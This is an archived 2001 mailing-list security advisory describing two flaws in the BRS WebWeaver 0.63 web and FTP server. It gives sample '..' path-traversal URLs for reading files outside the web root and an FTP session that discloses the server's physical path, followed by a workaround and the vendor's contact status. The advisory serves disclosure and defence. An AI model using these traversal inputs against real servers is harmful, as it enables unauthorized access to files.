OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: joetestaHUSHMAIL.COM
Date: Sat Apr 28 2001 - 18:57:20 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerabilities in BRS WebWeaver

        Overview

    BRS WebWeaver v0.63 is a combined ftp and web server available from
    http://bsoutham.home.dhs.org. Vulnerabilities exist in the web
    server which allow remote users to break out of the web root using
    relative paths (ie: '..', '...'). In addition, the ftp server
    can be made to disclose the physical path of the ftp root.

        Details

    The following URLs demonstrate the problem with the web server:

            http://localhost/syshelp/../[any file outside the web root]
            http://localhost/sysimages/../[any file outside the web root]
            http://localhost/scripts/../[any file outside the web root]

    The following is an illustration of the problem with the ftp server:

    >ftp localhost
    Connected to xxxxxxxxxxxx.rh.rit.edu.
    220 BRS WebWeaver FTP Server ready.
    User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog.
    Password:
    230 User jdog logged in.
    ftp> cd *
    250 CWD command successful. "/*/" is current directory.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
    c:\windows\desktop\*\*.* not found
    226 File sent ok
    ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
    ftp>

        Solution

    The web server root traversal vulnerabilities can be prevented by removing
    all user-defined aliases (ie: 'syshelp', 'sysimages') as well as the
    ISAPI/CGI alias (ie: 'scripts'). There is no solution for the ftp root
    disclosure vulnerability.

        Vendor Status

    Blaine R Southam was contacted via <bsouthaminame.com> on
    Saturday, April 21, 2001. No reply was received.

        - Joe Testa

    e-mail: joetestahushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron

    ----- Begin Hush Signature v1.3 -----
    CVqvkyjBiGMOAQcLrFNKLcRZLBW13KOe9d2JMMIzTrZhsT9l2ihsNcFO3G/yGOL2qAIx
    kMC9Z2ijFy/RRJEC02qDgHcL1vEMEq2LlU3cpY+zb3yZ8jb6AarulkaGbw4eEjD1R7ER
    t/Gyq2X++pHMSlsMU7151N9H5Vl4WcjsU/7kJQHqgglKD2EtjhdHi3BgWnBhyqVa8Mp/
    IaVjpWAC3Pxa3kp3jdJ2IE4OE399GMh1brJJGAb/spWiAXbE+pTKq6Llu35DCex2QgtL
    n0LjgAsWom6PdZzCFyi6nfLvToMt1xr5TbJDnG0dvS6FYjQbiubcLRUEi+K1qSvE5+RD
    N+yAyPda+trSaJLd1O6o/kNse2KvntAtlexC/hRdrPxjX5F0guoFfaNhgPBQrssInM/+
    gk6lgWNaEUV/AxyCRUvqenkMkBd19alQ5M6dY+XEpdDIB4/Mo9xic/ekbSmqcNmOHKyX
    T/DX0EMDxts6GI715LXY0Imv1jx52X1CuMGvBaVtuOal
    ----- End Hush Signature v1.3 -----

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools

    Free, encrypted, secure Web-based email at www.hushmail.com